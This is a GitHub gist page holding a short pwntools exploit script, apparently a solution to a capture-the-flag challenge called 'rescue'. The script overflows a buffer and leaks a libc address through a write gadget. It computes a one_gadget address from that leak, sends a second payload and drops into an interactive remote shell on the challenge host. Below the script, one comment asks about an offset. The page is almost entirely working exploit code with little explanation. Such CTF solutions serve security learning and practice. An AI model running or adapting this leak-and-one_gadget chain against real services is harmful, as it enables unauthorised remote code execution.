Skip to content

Instantly share code, notes, and snippets.

@CreateRemoteThread

CreateRemoteThread/ndh-pwn1.py

Created March 31, 2018 22:57
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CreateRemoteThread/5c53a80b4367f5fb3d72f19950b9a9e3 to your computer and use it in GitHub Desktop.
Save CreateRemoteThread/5c53a80b4367f5fb3d72f19950b9a9e3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ndh-pwn1.py
#!/usr/bin/python
import pwn
import struct
p = pwn.remote("rescueshell.challs.malice.fr",6060)
# p = pwn.process("./rescue")
raw_input("ATTACH NOW")
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601210 + 320) # PRINTF
payload += pwn.p64(0x40099a) # WRITE GADGET
p.recv()
p.sendline(payload)
data = p.recv(timeout=2)
# i think it eats zeros. lets grab 0x7f as the start.
print "DATA IS: " + data.encode("hex")
data = data[0:6] + "\x00\x00"
strncmp_leak = struct.unpack("<Q",data[0:8])
print hex(strncmp_leak[0])
# fread
one_gadget = strncmp_leak[0] - 0x6A460 + 0x41320
print "one_gadget leak at %x" % one_gadget
payload = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
payload += pwn.p64(0x601208 + 320) # PRINTF
payload += pwn.p64(one_gadget)
p.sendline(payload)
p.interactive()
@hacker1984
Copy link

May I know which offset is 0x41320

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment